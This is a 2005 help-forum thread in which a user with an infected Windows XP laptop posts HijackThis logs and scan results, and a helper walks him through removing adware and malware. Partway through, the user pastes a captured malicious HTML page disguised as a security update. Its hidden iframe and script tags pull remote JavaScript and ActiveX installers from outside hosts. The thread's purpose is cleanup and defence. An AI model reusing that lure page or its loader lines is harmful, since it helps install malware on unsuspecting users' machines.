Suspicious Stuff on my machine

Unknown

First time in this or any other forum like this, so if this is old hat to anyone, please forgive me...

My machine won't let me open Task Manager, regedit, event viewer or msconfig. I've been able to see Task Manager and regedit for a couple seconds, but never have been able to see msconfig or event viewer since I noticed the problem earlier today. Also, the little yellow shield icon that says "downloading updates" for the McAfee antivirus will hang up at 1% whenever I log on to the internet. As if that wasn't enough, when I try and open task manager, I can see the little green icon in the lower right near the clock, but it disappears as soon as I mouse over it. It comes back if I try and start Task Mgr again and stays after Task Mgr window disappears, but will always disappear as soon as I mouse over it again. I can even make the green icon appear in multiple instances, but all of them will disappear as soon as I mouse over one of them. I've rebooted and run a McAfee virus scan, finding the bestfriends[1].pif, and gone through the steps to get rid of that, (I think successfully) but symptoms remain.

Running winXP, IBM R40 laptop, also used by my 13 yo daughter...grrr...

Anyone, please help!!

Thanks,
Matt

Buckeye_Sam

We need to see what's going on in your computer. Please post a hijackthis log.

http://www.short-media.com/forum/showpost.php?p=172584&postcount=2

GnarlyCar

Thanks for the reply. I've begun to notice some other symptoms as well. I can't open the disk defrag application, and I can't get into "manage" through MyComputer>manage. Also, my AOL settings seem to be changing by themselves, such as my background preference being repeatedly set to default, and I think some applications have been closing by themselves for no reason, but I'm not positive of that one, as I work with a LOT of applications open at a time and could have closed a few without remembering I did it. I'm wondering if this is an AOL-specific thing, because of the fact that it's affecting AOL the way it is.


Logfile of HijackThis v1.99.0
Scan saved at 7:52:10 AM, on 2/15/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\ibmpmsvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\drivers\KodakCCS.exe
c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\System32\QCONSVC.EXE
C:\WINDOWS\System32\RegSrvc.exe
C:\WINDOWS\system32\ScsiAccess.EXE
C:\WINDOWS\system32\TpKmpSVC.exe
C:\WINDOWS\wanmpsvc.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\PROGRA~1\ThinkPad\PkgMgr\HOTKEY\TPHKMGR.exe
C:\WINDOWS\system32\RunDll32.exe
C:\PROGRA~1\ThinkPad\UTILIT~1\TP98TRAY.EXE
C:\Program Files\ThinkPad\ConnectUtilities\QCWLICON.EXE
C:\Program Files\ThinkPad\PkgMgr\HOTKEY\TPONSCR.exe
C:\Program Files\ThinkPad\PkgMgr\HOTKEY_1\TpScrex.exe
C:\PROGRA~1\ThinkPad\UTILIT~1\NPDTray.exe
C:\PROGRA~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\system32\dla\tfswctrl.exe
C:\WINDOWS\system32\r3proxy.exe
C:\Program Files\Common Files\AOL\ACS\AOLDial.exe
C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe
C:\PROGRA~1\mcafee.com\vso\mcvsshld.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
C:\PROGRA~1\COMMON~1\AOL\110083~1\EE\AOLHOS~1.EXE
C:\Program Files\IBM\Messages By IBM\ibmmessages.exe
C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\WINDOWS\system32\SINSTANTM.EXE
C:\PROGRA~1\COMMON~1\AOL\110083~1\EE\AOLServiceHost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Internet Explorer\iexplore.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\America Online 9.0a\waol.exe
C:\Documents and Settings\Matt\My Documents\Adware Utilities\hijackthis\HijackThis.exe
C:\Program Files\America Online 9.0a\shellmon.exe

O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O3 - Toolbar: McAfee VirusScan - {BA52B914-B692-46c4-B683-905236F6F655} - c:\progra~1\mcafee.com\vso\mcvsshl.dll
O4 - HKLM\..\Run: [S3TRAY2] S3Tray2.exe
O4 - HKLM\..\Run: [SynTPLpr] C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [ATIModeChange] Ati2mdxx.exe
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe irprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [TPHOTKEY] C:\PROGRA~1\ThinkPad\PkgMgr\HOTKEY\TPHKMGR.exe
O4 - HKLM\..\Run: [BMMGAG] RunDll32 C:\PROGRA~1\ThinkPad\UTILIT~1\pwrmonit.dll,StartPwrMonitor
O4 - HKLM\..\Run: [TPTRAY] C:\PROGRA~1\ThinkPad\UTILIT~1\TP98TRAY.EXE
O4 - HKLM\..\Run: [QCWLICON] C:\Program Files\ThinkPad\ConnectUtilities\QCWLICON.EXE
O4 - HKLM\..\Run: [TPKMAPHELPER] C:\Program Files\ThinkPad\Utilities\TpKmapAp.exe -helper
O4 - HKLM\..\Run: [TP4EX] tp4ex.exe
O4 - HKLM\..\Run: [NPDTray] C:\PROGRA~1\ThinkPad\UTILIT~1\NPDTray.exe
O4 - HKLM\..\Run: [EZEJMNAP] C:\PROGRA~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [StorageGuard] "c:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [dla] C:\WINDOWS\system32\dla\tfswctrl.exe
O4 - HKLM\..\Run: [Fellowes Proxy] C:\WINDOWS\system32\r3proxy.exe
O4 - HKLM\..\Run: [HostManager] C:\Program Files\Common Files\AOL\1100837085\EE\AOLHostManager.exe
O4 - HKLM\..\Run: [AOLDialer] C:\Program Files\Common Files\AOL\ACS\AOLDial.exe
O4 - HKLM\..\Run: [AOL Spyware Protection] "C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe"
O4 - HKLM\..\Run: [VSOCheckTask] "c:\PROGRA~1\mcafee.com\vso\mcmnhdlr.exe" /checktask
O4 - HKLM\..\Run: [VirusScan Online] "c:\PROGRA~1\mcafee.com\vso\mcvsshld.exe"
O4 - HKLM\..\Run: [MCAgentExe] c:\PROGRA~1\mcafee.com\agent\mcagent.exe
O4 - HKLM\..\Run: [MCUpdateExe] C:\PROGRA~1\mcafee.com\agent\mcupdate.exe
O4 - HKLM\..\Run: [Pure Networks Port Magic] "C:\PROGRA~1\PURENE~1\PORTMA~1\PortAOL.exe" -Run
O4 - HKLM\..\Run: [ibmmessages] C:\Program Files\IBM\Messages By IBM\ibmmessages.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\PCHealth\HelpCtr\Binaries\MSConfig.exe /auto
O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
O4 - HKLM\..\Run: [Scuba Instant Messenger] SINSTANTM.EXE
O4 - HKCU\..\Run: [AOL Fast Start] "C:\Program Files\America Online 9.0a\AOL.EXE" -b
O4 - HKCU\..\Run: [ibmmessages] C:\Program Files\IBM\Messages By IBM\ibmmessages.exe
O4 - HKCU\..\RunOnce: [Scuba Instant Messenger] SINSTANTM.EXE
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.av.aol.com/molbin/shared/mcinsctl/en-us/4,0,0,83/mcinsctl.cab
O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} (DwnldGroupMgr Class) - http://download.av.aol.com/molbin/shared/mcgdmgr/en-us/1,0,0,20/mcgdmgr.cab
O16 - DPF: {D719897A-B07A-4C0C-AEA9-9B663A28DFCB} (iTunesDetector Class) - http://ax.phobos.apple.com.edgesuite.net/detection/ITDetector.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{3B6F6C4F-0C50-4BB3-B7BB-49EE0C30ED4E}: NameServer = 66.133.191.35
O18 - Protocol: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll
O23 - Service: AOL Connectivity Service - America Online - C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
O23 - Service: AOL TopSpeed Monitor - America Online, Inc - C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
O23 - Service: AOL Spyware Protection Service - Unknown - C:\Program Files\Common Files\AOL\AOL Spyware Protection\\aolserv.exe
O23 - Service: Ati HotKey Poller - Unknown - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: IBM PM Service - Unknown - C:\WINDOWS\System32\ibmpmsvc.exe
O23 - Service: Kodak Camera Connection Software - Eastman Kodak Company - C:\WINDOWS\system32\drivers\KodakCCS.exe
O23 - Service: McAfee.com McShield - Unknown - c:\PROGRA~1\mcafee.com\vso\mcshield.exe
O23 - Service: McAfee SecurityCenter Update Manager - Networks Associates Technology, Inc - C:\PROGRA~1\McAfee.com\Agent\mcupdmgr.exe
O23 - Service: McAfee.com VirusScan Online Realtime Engine - Networks Associates Technology, Inc - c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
O23 - Service: PLSRemote Service - Unknown - C:\WINDOWS\SYSTEM32\PLSRemote.exe
O23 - Service: QCONSVC - Unknown - C:\WINDOWS\System32\QCONSVC.EXE
O23 - Service: RegSrvc - Intel Corporation - C:\WINDOWS\System32\RegSrvc.exe
O23 - Service: Spectrum24 Event Monitor - Intel Corporation - C:\WINDOWS\System32\S24EvMon.exe
O23 - Service: ScsiAccess - Unknown - C:\WINDOWS\system32\ScsiAccess.EXE
O23 - Service: IBM KCU Service - Unknown - C:\WINDOWS\system32\TpKmpSVC.exe
O23 - Service: WAN Miniport (ATW) Service - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe

Thanks for the help, I really appreciate any advice anyone can offer...

Matt

GnarlyCar

I also found the following code on a recent documents list in my TSW Webcoder... The file is called trufkz.html, and I also found a file called x.bat right next to it in my C: drive that was last modified within 2 minutes of this one. It don't look good...

When I previewed it, I got a window that said something about a plug in needed, and "You must click 3 times to proceed." I'm guessing my daughter clicked 3 times...

Can anyone tell what this is doing?

<html>
<title> .:(sEcuritY UpdATe):. </title>
<body>

<iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
<script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script&gt;
<script language="JavaScript">
mtrslib_uid = '2396';
mtrslib_retry = 1;
mt_set_onload();
</script>

<script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a075a97a/a677aa.js"></script&gt;
<script language="javascript" type="text/javascript">self.focus();</script>

<script language="JavaScript" type="text/JavaScript" src="http://data.overpro.com/getActivex.aspx?&event_type=onLoad&recurrence=always&retry=3&loadFirst=1&delayLoad=0&affiliateId=f8566799-84af-450a-969e-f6f284a078cd&productId=35f05749-e699-45df-a27f-79c05110c180"></script&gt; <script language="JavaScript">self.focus();</script>

</body>
</html>

Buckeye_Sam

That code is taking you to two different websites that will install more malware on your computer. Delete it and any other html files that you find with recent dates. Now we'll see what else we can do for you.



Show hidden files
http://www.short-media.com/forum/showpost.php?p=172588&postcount=3



Place a checkmark next to these entries, close all browsers and windows, and have HijackThis fix them by clicking Fix Checked:

O4 - HKLM\..\Run: [Scuba Instant Messenger] SINSTANTM.EXE
O4 - HKCU\..\RunOnce: [Scuba Instant Messenger] SINSTANTM.EXE



Reboot your computer into Safe Mode



Then delete this file:

SINSTANTM.EXE



Reboot back to normal mode.



Please run these two online scans.
Make sure they are set to clean automatically:

http://housecall.trendmicro.com/

http://www.pandasoftware.com/activescan/com/activescan_principal.htm

If there are files that can not be removed by the scans please include that information in your next post.



Next download Ad-aware SE from: http://www.majorgeeks.com/download506.html

Install the program and launch it.

First, in the main window, look in the bottom right corner and click on Check for updates now and download the latest reference files.

Next, we need to configure Ad-aware for a full scan.

Click on the Gear icon (second from the left) to access the preferences/settings window

1. In the General window make sure the following are selected:

* Automatically save log-file
* Automatically quarantine objects prior to removal
* Safe Mode (always request confirmation)

2. Click on the Scanning button on the left and select :

* Scan Within Archives
* Scan Active Processes
* Scan Registry
* Deep Scan Registry
* Scan my IE favorites for banned URL’s
* Scan my Hosts file
* Under Click here to select drives + folders, choose:
* All of your hard drives

Click on the Advanced button on the left and select:

* Include additional process information
* Include additional file information
* Include environment information

Click the Tweak button and select:

* Under the Scanning Engine:
o Unload recognized processes & modules during scan
o Include additional Ad-aware settings in logfile
* Under the Cleaning Engine:
o Let Windows remove files in use at next reboot

Click on Proceed to save the settings.

Click Start and on the next screen choose Activate in-depth Scan at the bottom of the page and then choose:

* Use Custom Scanning Options

Click Next and Ad-aware will scan your hard drive(s) with the options you have selected.

Save the log file when it asks and then click Finish

When finished, mark everything for removal and get rid of it. (Right-click the window and choose Select All from the drop down menu and click Next).





Reboot and post a new hijackthis log.

GnarlyCar

Sam, my good man, you're a gentleman and a scholar.
I followed your instructions to a "T", and all symptoms have disappeared. I'm now able to use Task Manager, Management Console, Event Viewer, msconfig, regedit, and everything else I've tried, and as if that isn't enough, my machine works faster than it has since I bought it.

I do, however, have an icon on my desktop now that I don't know from where it came. It's transparent like a hidden folder, and it's called "desktop.ini". Looks like any .ini icon, ie; notepad with a gear on it, just transparent. I have no idea how it got there or why. I hope you can offer some suggestions toward that.

Per your requests, the following are copies of the HJT and scan logs:

Logfile of HijackThis v1.99.0
Scan saved at 2:25:11 AM, on 2/16/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\ibmpmsvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\drivers\KodakCCS.exe
c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\System32\QCONSVC.EXE
C:\WINDOWS\System32\RegSrvc.exe
C:\WINDOWS\system32\ScsiAccess.EXE
C:\WINDOWS\system32\TpKmpSVC.exe
C:\WINDOWS\wanmpsvc.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\PROGRA~1\ThinkPad\PkgMgr\HOTKEY\TPHKMGR.exe
C:\WINDOWS\system32\RunDll32.exe
C:\PROGRA~1\ThinkPad\UTILIT~1\TP98TRAY.EXE
C:\Program Files\ThinkPad\ConnectUtilities\QCWLICON.EXE
C:\PROGRA~1\ThinkPad\UTILIT~1\NPDTray.exe
C:\Program Files\ThinkPad\PkgMgr\HOTKEY\TPONSCR.exe
C:\Program Files\ThinkPad\PkgMgr\HOTKEY_1\TpScrex.exe
C:\PROGRA~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe
C:\WINDOWS\system32\r3proxy.exe
C:\Program Files\Common Files\AOL\ACS\AOLDial.exe
C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe
C:\PROGRA~1\mcafee.com\vso\mcvsshld.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\PROGRA~1\mcafee.com\agent\mcupdate.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
C:\Program Files\IBM\Messages By IBM\ibmmessages.exe
C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\WINDOWS\system32\dla\tfswctrl.exe
C:\PROGRA~1\COMMON~1\AOL\110083~1\EE\AOLHOS~1.EXE
C:\WINDOWS\AGRSMMSG.exe
C:\PROGRA~1\COMMON~1\AOL\110083~1\EE\AOLServiceHost.exe
C:\Program Files\America Online 9.0a\waol.exe
C:\Program Files\America Online 9.0a\shellmon.exe
C:\WINDOWS\system32\notepad.exe
C:\Documents and Settings\Matt\My Documents\Adware Utilities\hijackthis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 10.1.3.1:8080
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O3 - Toolbar: McAfee VirusScan - {BA52B914-B692-46c4-B683-905236F6F655} - c:\progra~1\mcafee.com\vso\mcvsshl.dll
O4 - HKLM\..\Run: [SynTPLpr] C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe irprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [TPHOTKEY] C:\PROGRA~1\ThinkPad\PkgMgr\HOTKEY\TPHKMGR.exe
O4 - HKLM\..\Run: [BMMGAG] RunDll32 C:\PROGRA~1\ThinkPad\UTILIT~1\pwrmonit.dll,StartPwrMonitor
O4 - HKLM\..\Run: [TPTRAY] C:\PROGRA~1\ThinkPad\UTILIT~1\TP98TRAY.EXE
O4 - HKLM\..\Run: [QCWLICON] C:\Program Files\ThinkPad\ConnectUtilities\QCWLICON.EXE
O4 - HKLM\..\Run: [TPKMAPHELPER] C:\Program Files\ThinkPad\Utilities\TpKmapAp.exe -helper
O4 - HKLM\..\Run: [NPDTray] C:\PROGRA~1\ThinkPad\UTILIT~1\NPDTray.exe
O4 - HKLM\..\Run: [EZEJMNAP] C:\PROGRA~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [StorageGuard] "c:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [Fellowes Proxy] C:\WINDOWS\system32\r3proxy.exe
O4 - HKLM\..\Run: [HostManager] C:\Program Files\Common Files\AOL\1100837085\EE\AOLHostManager.exe
O4 - HKLM\..\Run: [AOLDialer] C:\Program Files\Common Files\AOL\ACS\AOLDial.exe
O4 - HKLM\..\Run: [AOL Spyware Protection] "C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe"
O4 - HKLM\..\Run: [VSOCheckTask] "c:\PROGRA~1\mcafee.com\vso\mcmnhdlr.exe" /checktask
O4 - HKLM\..\Run: [VirusScan Online] "c:\PROGRA~1\mcafee.com\vso\mcvsshld.exe"
O4 - HKLM\..\Run: [MCAgentExe] c:\PROGRA~1\mcafee.com\agent\mcagent.exe
O4 - HKLM\..\Run: [MCUpdateExe] C:\PROGRA~1\mcafee.com\agent\mcupdate.exe
O4 - HKLM\..\Run: [Pure Networks Port Magic] "C:\PROGRA~1\PURENE~1\PORTMA~1\PortAOL.exe" -Run
O4 - HKLM\..\Run: [ibmmessages] C:\Program Files\IBM\Messages By IBM\ibmmessages.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\PCHealth\HelpCtr\Binaries\MSConfig.exe /auto
O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
O4 - HKLM\..\Run: [TP4EX] tp4ex.exe
O4 - HKLM\..\Run: [S3TRAY2] S3Tray2.exe
O4 - HKLM\..\Run: [dla] C:\WINDOWS\system32\dla\tfswctrl.exe
O4 - HKLM\..\Run: [ATIModeChange] Ati2mdxx.exe
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKCU\..\Run: [AOL Fast Start] "C:\Program Files\America Online 9.0a\AOL.EXE" -b
O4 - HKCU\..\Run: [ibmmessages] C:\Program Files\IBM\Messages By IBM\ibmmessages.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.av.aol.com/molbin/shared/mcinsctl/en-us/4,0,0,83/mcinsctl.cab
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai.net/7/840/537/2004061001/housecall.trendmicro.com/housecall/xscan53.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} (DwnldGroupMgr Class) - http://download.av.aol.com/molbin/shared/mcgdmgr/en-us/1,0,0,20/mcgdmgr.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{3B6F6C4F-0C50-4BB3-B7BB-49EE0C30ED4E}: NameServer = 66.133.191.35
O18 - Protocol: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll
O23 - Service: AOL Connectivity Service - America Online - C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
O23 - Service: AOL TopSpeed Monitor - America Online, Inc - C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
O23 - Service: AOL Spyware Protection Service - Unknown - C:\Program Files\Common Files\AOL\AOL Spyware Protection\\aolserv.exe
O23 - Service: Ati HotKey Poller - Unknown - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: IBM PM Service - Unknown - C:\WINDOWS\System32\ibmpmsvc.exe
O23 - Service: Kodak Camera Connection Software - Eastman Kodak Company - C:\WINDOWS\system32\drivers\KodakCCS.exe
O23 - Service: McAfee.com McShield - Unknown - c:\PROGRA~1\mcafee.com\vso\mcshield.exe
O23 - Service: McAfee SecurityCenter Update Manager - Networks Associates Technology, Inc - C:\PROGRA~1\McAfee.com\Agent\mcupdmgr.exe
O23 - Service: McAfee.com VirusScan Online Realtime Engine - Networks Associates Technology, Inc - c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
O23 - Service: PLSRemote Service - Unknown - C:\WINDOWS\SYSTEM32\PLSRemote.exe
O23 - Service: QCONSVC - Unknown - C:\WINDOWS\System32\QCONSVC.EXE
O23 - Service: RegSrvc - Intel Corporation - C:\WINDOWS\System32\RegSrvc.exe
O23 - Service: Spectrum24 Event Monitor - Intel Corporation - C:\WINDOWS\System32\S24EvMon.exe
O23 - Service: ScsiAccess - Unknown - C:\WINDOWS\system32\ScsiAccess.EXE
O23 - Service: IBM KCU Service - Unknown - C:\WINDOWS\system32\TpKmpSVC.exe
O23 - Service: WAN Miniport (ATW) Service - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe

****************************************************
Activescan (Panda)

Spyware:Spyware/New.net No disinfected C:\WINDOWS\NDNuninstall*.exe
(Found and deleted)
Adware:Adware/WUpd No disinfected Windows Registry
(Couldn't find, will run a search)

Adware:Adware/MediaTickets No disinfected C:\Documents and Settings\Matt\Desktop\securityCRAPdate.txt
(This was a copy of the trufkz code that I saved on my desktop, it's going away)
Possible Virus. No disinfected C:\IBMTOOLS\APPS\RRPC\DATA1.CAB[setup.EXE][PCRECSA.EXE]
(This .cab file showed nothing inside, wasn't able to clear this)
Adware:Adware/MediaTickets No disinfected C:\Install.exe[trufkz.html]
(This is SO gone)

Adware:Adware/MediaTickets No disinfected C:\RECYCLER\S-1-5-21-402350127-190368106-1736902927-1004\Dc971.html
(couln't find)
Adware:Adware/WUpd No disinfected C:\RECYCLER\S-1-5-21-402350127-190368106-1736902927-500\Dc1\AdTools.exe
(couln't find in this location, but found and deleted AdTools folder)
Adware:Adware/WUpd No disinfected C:\WINDOWS\Downloaded Program Files\DeskAdX.dll
(couln't find in this folder)


Up against characters-per-post limit...cont'd in following post...

GnarlyCar

**Cont'd from previous post**

Ad-Aware SE Build 1.05
Logfile Created on:Wednesday, February 16, 2005 12:39:32 AM
Created with Ad-Aware SE Personal, free for private use.
Using definitions file:SE1R27 05.02.2005
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

References detected during the scan:
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
MRU List(TAC index:0):28 total references
Tracking Cookie(TAC index:3):13 total references
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

Definition File:
=========================
Definitions File Loaded:
Reference Number : SE1R27 05.02.2005
Internal build : 32
File location : C:\Program Files\Lavasoft\Ad-Aware SE Personal\defs.ref
File size : 410347 Bytes
Total size : 1296130 Bytes
Signature data size : 1266439 Bytes
Reference data size : 29179 Bytes
Signatures total : 36032
Fingerprints total : 616
Fingerprints size : 23320 Bytes
Target categories : 15
Target families : 631


Memory + processor status:
==========================
Number of processors : 1
Processor architecture : Non Intel
Memory available:14 %
Total physical memory:261040 kb
Available physical memory:33960 kb
Total page file size:640760 kb
Available on page file:363660 kb
Total virtual memory:2097024 kb
Available virtual memory:2036332 kb
OS:Microsoft Windows XP Professional Service Pack 2 (Build 2600)

Ad-Aware SE Settings
===========================
Set : Search for negligible risk entries
Set : Safe mode (always request confirmation)
Set : Scan active processes
Set : Scan registry
Set : Deep-scan registry
Set : Scan my IE Favorites for banned URLs
Set : Scan within archives
Set : Scan my Hosts file

Extended Ad-Aware SE Settings
===========================
Set : Unload recognized processes & modules during scan
Set : Scan registry for all users instead of current user only
Set : Always try to unload modules before deletion
Set : During removal, unload Explorer and IE if necessary
Set : Let Windows remove files in use at next reboot
Set : Delete quarantined objects after restoring
Set : Include basic Ad-Aware settings in log file
Set : Include additional Ad-Aware settings in log file
Set : Include reference summary in log file
Set : Include alternate data stream details in log file
Set : Play sound at scan completion if scan locates critical objects


2-16-2005 12:39:37 AM - Scan started. (Custom mode)

Listing running processes
